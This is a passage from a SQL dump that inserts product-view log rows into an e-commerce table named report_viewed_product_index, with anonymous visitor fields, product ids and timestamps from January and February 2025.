(15362, NULL, NULL, 2064, 1, '2025-01-17 03:31:16'),
(15363, NULL, NULL, 2063, 1, '2025-01-17 03:38:49'),
(15364, NULL, NULL, 2058, 1, '2025-01-17 03:59:01'),
(15365, NULL, NULL, 2055, 1, '2025-01-17 04:39:08'),
(15366, NULL, NULL, 2061, 1, '2025-01-17 06:14:16'),
(15367, NULL, NULL, 2060, 1, '2025-01-17 06:34:54'),
(15368, NULL, NULL, 2062, 1, '2025-01-17 07:11:01'),
(15369, NULL, NULL, 2060, 1, '2025-01-17 09:00:21'),
(15370, NULL, NULL, 2063, 1, '2025-01-17 09:18:41'),
(15371, NULL, NULL, 2058, 1, '2025-01-17 10:04:14'),
(15372, NULL, NULL, 2060, 1, '2025-01-17 10:38:46'),
(15373, NULL, NULL, 2063, 1, '2025-01-17 10:47:45'),
(15374, NULL, NULL, 2058, 1, '2025-01-17 11:10:16'),
(15375, NULL, NULL, 2055, 1, '2025-01-17 11:54:49'),
(15376, NULL, NULL, 2061, 1, '2025-01-17 13:34:06'),
(15377, NULL, NULL, 2062, 1, '2025-01-17 14:28:33'),
(15378, NULL, NULL, 2060, 1, '2025-01-17 16:05:07'),
(15379, NULL, NULL, 2063, 1, '2025-01-17 16:13:21'),
(15380, NULL, NULL, 2058, 1, '2025-01-17 16:35:06'),
(15381, NULL, NULL, 2059, 1, '2025-01-17 16:46:50'),
(15382, NULL, NULL, 2055, 1, '2025-01-17 17:19:35'),
(15383, NULL, NULL, 2060, 1, '2025-01-17 17:54:13'),
(15384, NULL, NULL, 2063, 1, '2025-01-17 18:03:24'),
(15385, NULL, NULL, 2060, 1, '2025-01-17 18:31:52'),
(15386, NULL, NULL, 2063, 1, '2025-01-17 18:40:48'),
(15387, NULL, NULL, 2058, 1, '2025-01-17 19:03:59'),
(15388, NULL, NULL, 2055, 1, '2025-01-17 19:49:21'),
(15389, NULL, NULL, 2061, 1, '2025-01-17 21:30:26'),
(15390, NULL, NULL, 2062, 1, '2025-01-17 22:30:27'),
(15391, NULL, NULL, 2054, 1, '2025-01-18 00:19:28'),
(15392, NULL, NULL, 2059, 1, '2025-01-18 00:38:01'),
(15393, NULL, NULL, 2064, 1, '2025-01-18 00:51:55'),
(15394, NULL, NULL, 2060, 1, '2025-01-18 01:50:32'),
(15395, NULL, NULL, 2063, 1, '2025-01-18 01:58:51'),
(15396, NULL, NULL, 2058, 1, '2025-01-18 02:19:52'),
(15397, NULL, NULL, 2055, 1, '2025-01-18 03:00:48'),
(15398, NULL, NULL, 2062, 1, '2025-01-18 04:25:38'),
(15399, NULL, NULL, 2061, 1, '2025-01-18 04:37:09'),
(15400, NULL, NULL, 2062, 1, '2025-01-18 05:33:27'),
(15401, NULL, NULL, 2064, 1, '2025-01-18 06:27:29'),
(15402, NULL, NULL, 2062, 1, '2025-01-18 06:28:08'),
(15403, NULL, NULL, 2053, 1, '2025-01-18 06:28:28'),
(15404, NULL, NULL, 2063, 1, '2025-01-18 06:29:12'),
(15405, NULL, NULL, 2061, 1, '2025-01-18 06:29:16'),
(15406, NULL, NULL, 2059, 1, '2025-01-18 06:29:24'),
(15407, NULL, NULL, 2058, 1, '2025-01-18 06:29:28'),
(15408, NULL, NULL, 2055, 1, '2025-01-18 06:30:36'),
(15409, NULL, NULL, 2054, 1, '2025-01-18 06:30:40'),
(15410, NULL, NULL, 2060, 1, '2025-01-18 06:31:24'),
(15411, NULL, NULL, 2054, 1, '2025-01-18 07:13:57'),
(15412, NULL, NULL, 2059, 1, '2025-01-18 07:31:34'),
(15413, NULL, NULL, 2064, 1, '2025-01-18 07:44:15'),
(15414, NULL, NULL, 2064, 1, '2025-01-18 09:42:37'),
(15415, NULL, NULL, 2062, 1, '2025-01-18 09:43:20'),
(15416, NULL, NULL, 2063, 1, '2025-01-18 09:44:16'),
(15417, NULL, NULL, 2061, 1, '2025-01-18 09:44:24'),
(15418, NULL, NULL, 2059, 1, '2025-01-18 09:44:32'),
(15419, NULL, NULL, 2058, 1, '2025-01-18 09:44:36'),
(15420, NULL, NULL, 2055, 1, '2025-01-18 09:45:44'),
(15421, NULL, NULL, 2054, 1, '2025-01-18 09:45:49'),
(15422, NULL, NULL, 2060, 1, '2025-01-18 09:47:56'),
(15423, NULL, NULL, 2055, 1, '2025-01-18 11:48:58'),
(15424, NULL, NULL, 2064, 1, '2025-01-18 12:35:03'),
(15425, NULL, NULL, 2064, 1, '2025-01-18 14:31:02'),
(15426, NULL, NULL, 2054, 1, '2025-01-18 15:03:25'),
(15427, NULL, NULL, 2062, 1, '2025-01-18 16:14:36'),
(15428, NULL, NULL, 2059, 1, '2025-01-18 16:24:59'),
(15429, NULL, NULL, 2053, 1, '2025-01-18 19:41:32'),
(15430, NULL, NULL, 2061, 1, '2025-01-18 20:32:23'),
(15431, NULL, NULL, 2063, 1, '2025-01-18 20:39:04'),
(15432, NULL, NULL, 2061, 1, '2025-01-19 04:09:16'),
(15433, NULL, NULL, 2064, 1, '2025-01-19 04:36:17'),
(15434, NULL, NULL, 2058, 1, '2025-01-19 05:11:33'),
(15435, NULL, NULL, 2064, 1, '2025-01-19 07:10:47'),
(15436, NULL, NULL, 2064, 1, '2025-01-19 07:12:37'),
(15437, NULL, NULL, 2058, 1, '2025-01-19 09:55:47'),
(15438, NULL, NULL, 2059, 1, '2025-01-19 10:08:10'),
(15439, NULL, NULL, 2055, 1, '2025-01-19 11:55:16'),
(15440, NULL, NULL, 2058, 1, '2025-01-19 14:07:33'),
(15441, NULL, NULL, 2062, 1, '2025-01-19 17:59:44'),
(15442, NULL, NULL, 2063, 1, '2025-01-19 19:49:57'),
(15443, NULL, NULL, 2058, 1, '2025-01-19 22:18:38'),
(15444, NULL, NULL, 2063, 1, '2025-01-20 07:05:55'),
(15445, NULL, NULL, 2060, 1, '2025-01-20 07:55:41'),
(15446, NULL, NULL, 2060, 1, '2025-01-20 09:37:45'),
(15447, NULL, NULL, 2058, 1, '2025-01-20 13:53:19'),
(15448, NULL, NULL, 2062, 1, '2025-01-20 14:38:28'),
(15449, NULL, NULL, 2058, 1, '2025-01-20 21:49:01'),
(15450, NULL, NULL, 2059, 1, '2025-01-21 00:34:55'),
(15451, NULL, NULL, 2054, 1, '2025-01-21 04:03:13'),
(15452, NULL, NULL, 2059, 1, '2025-01-21 05:08:58'),
(15453, NULL, NULL, 2055, 1, '2025-01-21 05:54:02'),
(15454, NULL, NULL, 2058, 1, '2025-01-21 12:38:07'),
(15455, NULL, NULL, 2062, 1, '2025-01-21 16:03:55'),
(15456, NULL, NULL, 2062, 1, '2025-01-21 19:18:17'),
(15457, NULL, NULL, 2054, 1, '2025-01-22 03:20:28'),
(15458, NULL, NULL, 2055, 1, '2025-01-22 03:20:32'),
(15459, NULL, NULL, 2064, 1, '2025-01-22 03:20:40'),
(15460, NULL, NULL, 2063, 1, '2025-01-22 03:20:43'),
(15461, NULL, NULL, 2062, 1, '2025-01-22 03:20:45'),
(15462, NULL, NULL, 2060, 1, '2025-01-22 03:20:47'),
(15463, NULL, NULL, 2059, 1, '2025-01-22 03:20:50'),
(15464, NULL, NULL, 2061, 1, '2025-01-22 03:20:52'),
(15465, NULL, NULL, 2058, 1, '2025-01-22 03:20:54'),
(15466, NULL, NULL, 2064, 1, '2025-01-22 04:33:31'),
(15467, NULL, NULL, 2064, 1, '2025-01-22 05:30:18'),
(15468, NULL, NULL, 2063, 1, '2025-01-22 05:36:16'),
(15469, NULL, NULL, 2063, 1, '2025-01-22 06:58:24'),
(15470, NULL, NULL, 2058, 1, '2025-01-22 11:29:19'),
(15471, NULL, NULL, 2061, 1, '2025-01-22 12:40:05'),
(15472, NULL, NULL, 2058, 1, '2025-01-22 13:49:13'),
(15473, NULL, NULL, 2062, 1, '2025-01-22 16:02:03'),
(15474, NULL, NULL, 2054, 1, '2025-01-22 19:33:23'),
(15475, NULL, NULL, 2061, 1, '2025-01-23 04:50:34'),
(15476, NULL, NULL, 2059, 1, '2025-01-23 04:55:32'),
(15477, NULL, NULL, 2053, 1, '2025-01-23 05:15:32'),
(15478, NULL, NULL, 2059, 1, '2025-01-23 09:41:22'),
(15479, NULL, NULL, 2059, 1, '2025-01-23 09:41:23'),
(15480, NULL, NULL, 2061, 1, '2025-01-23 10:08:53'),
(15481, NULL, NULL, 2054, 1, '2025-01-23 10:09:00'),
(15482, NULL, NULL, 2063, 1, '2025-01-23 10:47:09'),
(15483, NULL, NULL, 2062, 1, '2025-01-23 10:47:10'),
(15484, NULL, NULL, 2060, 1, '2025-01-23 10:47:10'),
(15485, NULL, NULL, 2059, 1, '2025-01-23 10:47:12'),
(15486, NULL, NULL, 2058, 1, '2025-01-23 10:47:15'),
(15487, NULL, NULL, 2064, 1, '2025-01-23 10:49:50'),
(15488, NULL, NULL, 2061, 1, '2025-01-23 10:49:51'),
(15489, NULL, NULL, 2060, 1, '2025-01-23 10:49:51'),
(15490, NULL, NULL, 2055, 1, '2025-01-23 10:49:52'),
(15491, NULL, NULL, 2064, 1, '2025-01-23 10:49:53'),
(15492, NULL, NULL, 2063, 1, '2025-01-23 10:49:53'),
(15493, NULL, NULL, 2062, 1, '2025-01-23 10:49:54'),
(15494, NULL, NULL, 2060, 1, '2025-01-23 10:49:56'),
(15495, NULL, NULL, 2055, 1, '2025-01-23 10:52:26'),
(15496, NULL, NULL, 2054, 1, '2025-01-23 10:52:26'),
(15497, NULL, NULL, 2053, 1, '2025-01-23 10:52:31'),
(15498, NULL, NULL, 2058, 1, '2025-01-23 10:52:34'),
(15499, NULL, NULL, 2053, 1, '2025-01-23 10:52:36'),
(15500, NULL, NULL, 2058, 1, '2025-01-23 10:52:37'),
(15501, NULL, NULL, 2058, 1, '2025-01-23 12:39:45'),
(15502, NULL, NULL, 2054, 1, '2025-01-23 12:51:01'),
(15503, NULL, NULL, 2055, 1, '2025-01-23 14:03:02'),
(15504, NULL, NULL, 2062, 1, '2025-01-23 14:48:08'),
(15505, NULL, NULL, 2062, 1, '2025-01-23 15:54:46'),
(15506, NULL, NULL, 2061, 1, '2025-01-23 18:10:52'),
(15507, NULL, NULL, 2064, 1, '2025-01-24 05:35:35'),
(15508, NULL, NULL, 2062, 1, '2025-01-24 15:41:53'),
(15509, NULL, NULL, 2064, 1, '2025-01-24 18:19:43'),
(15510, NULL, NULL, 2062, 1, '2025-01-25 03:13:01'),
(15511, NULL, NULL, 2062, 1, '2025-01-25 12:10:21'),
(15512, NULL, NULL, 2062, 1, '2025-01-25 14:56:29'),
(15513, NULL, NULL, 2054, 1, '2025-01-25 17:28:26'),
(15514, NULL, NULL, 2058, 1, '2025-01-25 17:33:33'),
(15515, NULL, NULL, 2058, 1, '2025-01-25 21:38:10'),
(15516, NULL, NULL, 2061, 1, '2025-01-25 21:52:54'),
(15517, NULL, NULL, 2064, 1, '2025-01-26 00:27:29'),
(15518, NULL, NULL, 2060, 1, '2025-01-26 03:38:35'),
(15519, NULL, NULL, 2053, 1, '2025-01-26 07:01:05'),
(15520, NULL, NULL, 2063, 1, '2025-01-26 13:23:02');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(15521, NULL, NULL, 2062, 1, '2025-01-26 14:50:24'),
(15522, NULL, NULL, 2063, 1, '2025-01-26 16:16:09'),
(15523, NULL, NULL, 2062, 1, '2025-01-26 22:24:14'),
(15524, NULL, NULL, 2062, 1, '2025-01-27 14:31:52'),
(15525, NULL, NULL, 2063, 1, '2025-01-27 14:47:43'),
(15526, NULL, NULL, 2059, 1, '2025-01-27 16:04:54'),
(15527, NULL, NULL, 2064, 1, '2025-01-27 16:21:34'),
(15528, NULL, NULL, 2053, 1, '2025-01-28 04:17:58'),
(15529, NULL, NULL, 2060, 1, '2025-01-28 06:59:04'),
(15530, NULL, NULL, 2064, 1, '2025-01-28 07:29:41'),
(15531, NULL, NULL, 2064, 1, '2025-01-28 07:30:14'),
(15532, NULL, NULL, 2064, 1, '2025-01-28 07:30:41'),
(15533, NULL, NULL, 2064, 1, '2025-01-28 07:31:10'),
(15534, NULL, NULL, 2064, 1, '2025-01-28 07:31:33'),
(15535, NULL, NULL, 2064, 1, '2025-01-28 07:31:56'),
(15536, NULL, NULL, 2054, 1, '2025-01-28 07:39:44'),
(15537, NULL, NULL, 2055, 1, '2025-01-28 08:01:50'),
(15538, NULL, NULL, 2062, 1, '2025-01-28 11:26:48'),
(15539, NULL, NULL, 2055, 1, '2025-01-28 12:02:16'),
(15540, NULL, NULL, 2062, 1, '2025-01-28 14:33:02'),
(15541, NULL, NULL, 2064, 1, '2025-01-28 15:22:19'),
(15542, NULL, NULL, 2054, 1, '2025-01-28 16:22:45'),
(15543, NULL, NULL, 2055, 1, '2025-01-28 16:53:46'),
(15544, NULL, NULL, 2061, 1, '2025-01-28 18:17:25'),
(15545, NULL, NULL, 2059, 1, '2025-01-28 20:47:54'),
(15546, NULL, NULL, 2058, 1, '2025-01-28 20:57:28'),
(15547, NULL, NULL, 2054, 1, '2025-01-28 21:02:28'),
(15548, NULL, NULL, 2061, 1, '2025-01-28 23:15:03'),
(15549, NULL, NULL, 2060, 1, '2025-01-29 01:58:38'),
(15550, NULL, NULL, 2059, 1, '2025-01-29 08:57:47'),
(15551, NULL, NULL, 2064, 1, '2025-01-29 10:22:56'),
(15552, NULL, NULL, 2060, 1, '2025-01-29 12:11:23'),
(15553, NULL, NULL, 2054, 1, '2025-01-29 12:44:52'),
(15554, NULL, NULL, 2060, 1, '2025-01-29 14:33:59'),
(15555, NULL, NULL, 2062, 1, '2025-01-29 15:39:47'),
(15556, NULL, NULL, 2060, 1, '2025-01-29 17:38:06'),
(15557, NULL, NULL, 2060, 1, '2025-01-29 17:52:06'),
(15558, NULL, NULL, 2058, 1, '2025-01-29 21:43:03'),
(15559, NULL, NULL, 2058, 1, '2025-01-29 22:50:28'),
(15560, NULL, NULL, 2064, 1, '2025-01-29 22:50:38'),
(15561, NULL, NULL, 2062, 1, '2025-01-29 22:50:50'),
(15562, NULL, NULL, 2055, 1, '2025-01-29 22:50:52'),
(15563, NULL, NULL, 2059, 1, '2025-01-29 22:50:58'),
(15564, NULL, NULL, 2063, 1, '2025-01-29 22:51:00'),
(15565, NULL, NULL, 2054, 1, '2025-01-29 22:51:02'),
(15566, NULL, NULL, 2061, 1, '2025-01-29 22:51:04'),
(15567, NULL, NULL, 2060, 1, '2025-01-29 22:51:12'),
(15568, NULL, NULL, 2058, 1, '2025-01-29 22:51:27'),
(15569, NULL, NULL, 2064, 1, '2025-01-29 22:51:36'),
(15570, NULL, NULL, 2054, 1, '2025-01-29 22:51:41'),
(15571, NULL, NULL, 2062, 1, '2025-01-29 22:51:44'),
(15572, NULL, NULL, 2055, 1, '2025-01-29 22:51:45'),
(15573, NULL, NULL, 2059, 1, '2025-01-29 22:51:51'),
(15574, NULL, NULL, 2063, 1, '2025-01-29 22:51:54'),
(15575, NULL, NULL, 2061, 1, '2025-01-29 22:51:56'),
(15576, NULL, NULL, 2060, 1, '2025-01-29 22:51:59'),
(15577, NULL, NULL, 2053, 1, '2025-01-29 22:52:07'),
(15578, NULL, NULL, 2064, 1, '2025-01-30 11:58:28'),
(15579, NULL, NULL, 2058, 1, '2025-01-30 14:10:40'),
(15580, NULL, NULL, 2062, 1, '2025-01-30 14:48:56'),
(15581, NULL, NULL, 2062, 1, '2025-01-30 16:51:53'),
(15582, NULL, NULL, 2059, 1, '2025-01-30 20:14:36'),
(15583, NULL, NULL, 2053, 1, '2025-01-31 10:41:17'),
(15584, NULL, NULL, 2061, 1, '2025-01-31 12:56:06'),
(15585, NULL, NULL, 2054, 1, '2025-01-31 13:32:45'),
(15586, NULL, NULL, 2062, 1, '2025-01-31 14:39:57'),
(15587, NULL, NULL, 2059, 1, '2025-02-01 04:58:09'),
(15588, NULL, NULL, 2062, 1, '2025-02-01 05:39:49'),
(15589, NULL, NULL, 2062, 1, '2025-02-01 15:42:12'),
(15590, NULL, NULL, 2063, 1, '2025-02-01 17:25:08'),
(15591, NULL, NULL, 2063, 1, '2025-02-02 01:04:12'),
(15592, NULL, NULL, 2060, 1, '2025-02-02 01:53:35'),
(15593, NULL, NULL, 2059, 1, '2025-02-02 04:14:13'),
(15594, NULL, NULL, 2055, 1, '2025-02-02 06:59:00'),
(15595, NULL, NULL, 2062, 1, '2025-02-02 14:44:04'),
(15596, NULL, NULL, 2063, 1, '2025-02-02 23:14:28'),
(15597, NULL, NULL, 2064, 1, '2025-02-03 01:36:34'),
(15598, NULL, NULL, 2058, 1, '2025-02-03 03:58:49'),
(15599, NULL, NULL, 2053, 1, '2025-02-03 08:11:14'),
(15600, NULL, NULL, 2062, 1, '2025-02-03 14:29:08'),
(15601, NULL, NULL, 2063, 1, '2025-02-03 16:03:27'),
(15602, NULL, NULL, 2054, 1, '2025-02-03 17:21:26'),
(15603, NULL, NULL, 2058, 1, '2025-02-03 18:27:47'),
(15604, NULL, NULL, 2058, 1, '2025-02-03 18:41:31'),
(15605, NULL, NULL, 2061, 1, '2025-02-04 03:48:25'),
(15606, NULL, NULL, 2062, 1, '2025-02-04 10:39:49'),
(15607, NULL, NULL, 2062, 1, '2025-02-04 14:19:40'),
(15608, NULL, NULL, 2061, 1, '2025-02-04 14:20:22'),
(15609, NULL, NULL, 2060, 1, '2025-02-04 14:57:05'),
(15610, NULL, NULL, 2062, 1, '2025-02-04 15:23:40'),
(15611, NULL, NULL, 2061, 1, '2025-02-04 19:27:05'),
(15612, NULL, NULL, 2064, 1, '2025-02-04 20:58:13'),
(15613, NULL, NULL, 2064, 1, '2025-02-05 08:12:24'),
(15614, NULL, NULL, 2062, 1, '2025-02-05 14:38:46'),
(15615, NULL, NULL, 2059, 1, '2025-02-05 22:21:15'),
(15616, NULL, NULL, 2064, 1, '2025-02-05 22:59:44'),
(15617, NULL, NULL, 2060, 1, '2025-02-06 10:21:17'),
(15618, NULL, NULL, 2062, 1, '2025-02-06 15:51:38'),
(15619, NULL, NULL, 2063, 1, '2025-02-06 20:29:45'),
(15620, NULL, NULL, 2061, 1, '2025-02-07 01:35:50'),
(15621, NULL, NULL, 2058, 1, '2025-02-07 01:47:49'),
(15622, NULL, NULL, 2058, 1, '2025-02-07 03:20:17'),
(15623, NULL, NULL, 2055, 1, '2025-02-07 07:43:34'),
(15624, NULL, NULL, 2064, 1, '2025-02-07 13:27:55'),
(15625, NULL, NULL, 2059, 1, '2025-02-07 14:13:38'),
(15626, NULL, NULL, 2060, 1, '2025-02-07 15:51:17'),
(15627, NULL, NULL, 2062, 1, '2025-02-07 21:26:56'),
(15628, NULL, NULL, 2060, 1, '2025-02-07 22:13:15'),
(15629, NULL, NULL, 2062, 1, '2025-02-08 00:57:44'),
(15630, NULL, NULL, 2059, 1, '2025-02-08 05:41:12'),
(15631, NULL, NULL, 2055, 1, '2025-02-08 06:04:40'),
(15632, NULL, NULL, 2058, 1, '2025-02-08 06:04:40'),
(15633, NULL, NULL, 2064, 1, '2025-02-08 06:04:40'),
(15634, NULL, NULL, 2064, 1, '2025-02-08 06:04:40'),
(15635, NULL, NULL, 2064, 1, '2025-02-08 06:04:40'),
(15636, NULL, NULL, 2053, 1, '2025-02-08 06:04:40'),
(15637, NULL, NULL, 2061, 1, '2025-02-08 06:04:57'),
(15638, NULL, NULL, 2060, 1, '2025-02-08 06:05:16'),
(15639, NULL, NULL, 2054, 1, '2025-02-08 06:05:18'),
(15640, NULL, NULL, 2062, 1, '2025-02-08 06:05:19'),
(15641, NULL, NULL, 2053, 1, '2025-02-08 06:05:20'),
(15642, NULL, NULL, 2063, 1, '2025-02-08 06:05:22'),
(15643, NULL, NULL, 2059, 1, '2025-02-08 06:05:23'),
(15644, NULL, NULL, 2053, 1, '2025-02-08 08:03:45'),
(15645, NULL, NULL, 2062, 1, '2025-02-08 08:58:08'),
(15646, NULL, NULL, 2063, 1, '2025-02-08 13:23:38'),
(15647, NULL, NULL, 2062, 1, '2025-02-08 14:32:49'),
(15648, NULL, NULL, 2058, 1, '2025-02-08 14:52:55'),
(15649, NULL, NULL, 2058, 1, '2025-02-08 22:23:36'),
(15650, NULL, NULL, 2059, 1, '2025-02-09 07:00:07'),
(15651, NULL, NULL, 2063, 1, '2025-02-09 09:17:29'),
(15652, NULL, NULL, 2062, 1, '2025-02-09 14:36:27'),
(15653, NULL, NULL, 2060, 1, '2025-02-09 16:26:16'),
(15654, NULL, NULL, 2053, 1, '2025-02-09 17:36:48'),
(15655, NULL, NULL, 2054, 1, '2025-02-09 17:38:57'),
(15656, NULL, NULL, 2062, 1, '2025-02-09 20:23:32'),
(15657, NULL, NULL, 2064, 1, '2025-02-09 22:39:36'),
(15658, NULL, NULL, 2064, 1, '2025-02-09 22:46:47'),
(15659, NULL, NULL, 2063, 1, '2025-02-09 22:59:02'),
(15660, NULL, NULL, 2060, 1, '2025-02-09 23:09:32'),
(15661, NULL, NULL, 2059, 1, '2025-02-09 23:18:06'),
(15662, NULL, NULL, 2058, 1, '2025-02-10 00:06:54'),
(15663, NULL, NULL, 2064, 1, '2025-02-10 05:10:03'),
(15664, NULL, NULL, 2061, 1, '2025-02-10 14:27:12'),
(15665, NULL, NULL, 2062, 1, '2025-02-10 14:36:55'),
(15666, NULL, NULL, 2061, 1, '2025-02-11 00:15:58'),
(15667, NULL, NULL, 2058, 1, '2025-02-11 00:23:17'),
(15668, NULL, NULL, 2055, 1, '2025-02-11 00:33:19'),
(15669, NULL, NULL, 2064, 1, '2025-02-11 02:02:41'),
(15670, NULL, NULL, 2055, 1, '2025-02-11 13:02:51'),
(15671, NULL, NULL, 2062, 1, '2025-02-11 15:05:26'),
(15672, NULL, NULL, 2061, 1, '2025-02-12 05:52:16'),
(15673, NULL, NULL, 2061, 1, '2025-02-12 10:55:00'),
(15674, NULL, NULL, 2061, 1, '2025-02-12 10:55:03'),
(15675, NULL, NULL, 2064, 1, '2025-02-12 14:23:26'),
(15676, NULL, NULL, 2062, 1, '2025-02-12 15:05:01'),
(15677, NULL, NULL, 2061, 1, '2025-02-12 15:31:38'),
(15678, NULL, NULL, 2061, 1, '2025-02-12 16:09:36'),
(15679, NULL, NULL, 2062, 1, '2025-02-12 16:29:28'),
(15680, NULL, NULL, 2064, 1, '2025-02-12 17:44:29'),
(15681, NULL, NULL, 2060, 1, '2025-02-12 18:01:25'),
(15682, NULL, NULL, 2063, 1, '2025-02-12 19:28:42'),
(15683, NULL, NULL, 2059, 1, '2025-02-13 04:18:17'),
(15684, NULL, NULL, 2060, 1, '2025-02-13 05:10:53'),
(15685, NULL, NULL, 2062, 1, '2025-02-13 09:45:28'),
(15686, NULL, NULL, 2062, 1, '2025-02-13 10:26:06'),
(15687, NULL, NULL, 2062, 1, '2025-02-13 11:00:42'),
(15688, NULL, NULL, 2062, 1, '2025-02-13 12:15:49'),
(15689, NULL, NULL, 2062, 1, '2025-02-13 15:26:40'),
(15690, NULL, NULL, 2061, 1, '2025-02-13 17:46:01'),
(15691, NULL, NULL, 2064, 1, '2025-02-13 19:49:38'),
(15692, NULL, NULL, 2063, 1, '2025-02-13 21:59:21'),
(15693, NULL, NULL, 2062, 1, '2025-02-14 10:26:07'),
(15694, NULL, NULL, 2062, 1, '2025-02-14 12:02:46'),
(15695, NULL, NULL, 2064, 1, '2025-02-14 12:02:54'),
(15696, NULL, NULL, 2063, 1, '2025-02-14 12:02:55'),
(15697, NULL, NULL, 2062, 1, '2025-02-14 14:30:34'),
(15698, NULL, NULL, 2064, 1, '2025-02-14 17:24:21'),
(15699, NULL, NULL, 2058, 1, '2025-02-14 23:03:06'),
(15700, NULL, NULL, 2059, 1, '2025-02-15 02:04:53'),
(15701, NULL, NULL, 2064, 1, '2025-02-15 03:07:02'),
(15702, NULL, NULL, 2061, 1, '2025-02-15 10:46:50'),
(15703, NULL, NULL, 2062, 1, '2025-02-15 15:17:31'),
(15704, NULL, NULL, 2062, 1, '2025-02-15 19:30:50'),
(15705, NULL, NULL, 2062, 1, '2025-02-16 03:08:42'),
(15706, NULL, NULL, 2061, 1, '2025-02-16 03:41:34'),
(15707, NULL, NULL, 2063, 1, '2025-02-16 04:52:44'),
(15708, NULL, NULL, 2060, 1, '2025-02-16 12:13:12'),
(15709, NULL, NULL, 2058, 1, '2025-02-16 14:36:17'),
(15710, NULL, NULL, 2062, 1, '2025-02-16 14:49:07'),
(15711, NULL, NULL, 2063, 1, '2025-02-16 17:27:49'),
(15712, NULL, NULL, 2058, 1, '2025-02-16 19:32:33'),
(15713, NULL, NULL, 2064, 1, '2025-02-16 23:29:36'),
(15714, NULL, NULL, 2060, 1, '2025-02-17 05:22:37'),
(15715, NULL, NULL, 2064, 1, '2025-02-17 05:41:34'),
(15716, NULL, NULL, 2064, 1, '2025-02-17 10:06:49'),
(15717, NULL, NULL, 2062, 1, '2025-02-17 10:07:29'),
(15718, NULL, NULL, 2053, 1, '2025-02-17 10:07:48'),
(15719, NULL, NULL, 2063, 1, '2025-02-17 10:08:32'),
(15720, NULL, NULL, 2061, 1, '2025-02-17 10:08:36'),
(15721, NULL, NULL, 2059, 1, '2025-02-17 10:08:44'),
(15722, NULL, NULL, 2058, 1, '2025-02-17 10:08:48'),
(15723, NULL, NULL, 2055, 1, '2025-02-17 10:09:56'),
(15724, NULL, NULL, 2054, 1, '2025-02-17 10:10:00'),
(15725, NULL, NULL, 2060, 1, '2025-02-17 10:11:24'),
(15726, NULL, NULL, 2064, 1, '2025-02-17 13:11:51'),
(15727, NULL, NULL, 2061, 1, '2025-02-17 13:32:14'),
(15728, NULL, NULL, 2062, 1, '2025-02-17 14:54:18'),
(15729, NULL, NULL, 2054, 1, '2025-02-17 14:55:15'),
(15730, NULL, NULL, 2055, 1, '2025-02-17 15:43:42'),
(15731, NULL, NULL, 2060, 1, '2025-02-17 16:08:30'),
(15732, NULL, NULL, 2054, 1, '2025-02-17 18:07:03'),
(15733, NULL, NULL, 2064, 1, '2025-02-17 18:28:32'),
(15734, NULL, NULL, 2054, 1, '2025-02-17 18:52:34'),
(15735, NULL, NULL, 2054, 1, '2025-02-17 19:20:49'),
(15736, NULL, NULL, 2055, 1, '2025-02-17 20:37:43'),
(15737, NULL, NULL, 2059, 1, '2025-02-18 01:50:35'),
(15738, NULL, NULL, 2062, 1, '2025-02-18 02:03:07'),
(15739, NULL, NULL, 2061, 1, '2025-02-18 02:50:30'),
(15740, NULL, NULL, 2054, 1, '2025-02-18 04:07:39'),
(15741, NULL, NULL, 2063, 1, '2025-02-18 10:11:27'),
(15742, NULL, NULL, 2059, 1, '2025-02-18 12:55:47'),
(15743, NULL, NULL, 2062, 1, '2025-02-18 14:26:08'),
(15744, NULL, NULL, 2054, 1, '2025-02-18 16:07:43'),
(15745, NULL, NULL, 2062, 1, '2025-02-19 01:49:41'),
(15746, NULL, NULL, 2053, 1, '2025-02-19 05:05:42'),
(15747, NULL, NULL, 2059, 1, '2025-02-19 13:12:47'),
(15748, NULL, NULL, 2062, 1, '2025-02-19 14:19:49'),
(15749, NULL, NULL, 2061, 1, '2025-02-19 15:11:08'),
(15750, NULL, NULL, 2062, 1, '2025-02-19 15:11:37'),
(15751, NULL, NULL, 2060, 1, '2025-02-19 15:11:50'),
(15752, NULL, NULL, 2064, 1, '2025-02-19 17:36:07'),
(15753, NULL, NULL, 2064, 1, '2025-02-19 17:36:35'),
(15754, NULL, NULL, 2059, 1, '2025-02-19 19:09:43'),
(15755, NULL, NULL, 2058, 1, '2025-02-19 19:09:43'),
(15756, NULL, NULL, 2061, 1, '2025-02-19 19:09:43'),
(15757, NULL, NULL, 2054, 1, '2025-02-19 19:09:43'),
(15758, NULL, NULL, 2053, 1, '2025-02-19 19:09:48'),
(15759, NULL, NULL, 2055, 1, '2025-02-19 19:10:14'),
(15760, NULL, NULL, 2055, 1, '2025-02-19 19:10:18'),
(15761, NULL, NULL, 2054, 1, '2025-02-19 19:10:47'),
(15762, NULL, NULL, 2063, 1, '2025-02-19 19:10:48'),
(15763, NULL, NULL, 2062, 1, '2025-02-19 19:10:58'),
(15764, NULL, NULL, 2059, 1, '2025-02-19 19:11:00'),
(15765, NULL, NULL, 2058, 1, '2025-02-19 19:11:05'),
(15766, NULL, NULL, 2054, 1, '2025-02-19 21:21:07'),
(15767, NULL, NULL, 2063, 1, '2025-02-20 01:45:32'),
(15768, NULL, NULL, 2062, 1, '2025-02-20 01:45:47'),
(15769, NULL, NULL, 2060, 1, '2025-02-20 01:46:03'),
(15770, NULL, NULL, 2059, 1, '2025-02-20 01:46:16'),
(15771, NULL, NULL, 2061, 1, '2025-02-20 02:34:21'),
(15772, NULL, NULL, 2053, 1, '2025-02-20 02:39:46'),
(15773, NULL, NULL, 2063, 1, '2025-02-20 03:13:10'),
(15774, NULL, NULL, 2060, 1, '2025-02-20 03:13:23'),
(15775, NULL, NULL, 2055, 1, '2025-02-20 03:31:02'),
(15776, NULL, NULL, 2059, 1, '2025-02-20 06:24:28'),
(15777, NULL, NULL, 2054, 1, '2025-02-20 06:35:08'),
(15778, NULL, NULL, 2062, 1, '2025-02-20 14:56:20'),
(15779, NULL, NULL, 2055, 1, '2025-02-20 17:02:26'),
(15780, NULL, NULL, 2053, 1, '2025-02-20 19:32:52'),
(15781, NULL, NULL, 2053, 1, '2025-02-20 20:35:34'),
(15782, NULL, NULL, 2054, 1, '2025-02-21 05:02:10'),
(15783, NULL, NULL, 2064, 1, '2025-02-21 06:20:13'),
(15784, NULL, NULL, 2054, 1, '2025-02-21 10:04:13'),
(15785, NULL, NULL, 2062, 1, '2025-02-21 14:28:29'),
(15786, NULL, NULL, 2061, 1, '2025-02-21 15:59:14'),
(15787, NULL, NULL, 2062, 1, '2025-02-21 19:47:27'),
